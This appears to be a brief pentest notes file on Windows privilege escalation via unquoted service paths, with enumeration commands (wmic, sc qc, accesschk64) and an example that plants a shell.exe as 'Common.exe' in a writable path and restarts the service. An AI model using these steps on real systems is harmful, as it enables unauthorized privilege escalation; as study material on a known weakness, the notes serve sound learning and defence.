634 B

Raw Blame History

Unquoted Path

Path to a service without quotes can be hijacked by inserting other executables and services into the path.
Some part of path has to be writeable, windows tries to insert .exe instead of a space.
Check services via wmic service get name,displayname,pathname,startmode and sc qc <servicename>
Check permissions on paths via .\accesschk64.exe /accepteula -uwdq "C:\Service Path\"

Example

The unqoted path is C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"

net start <service>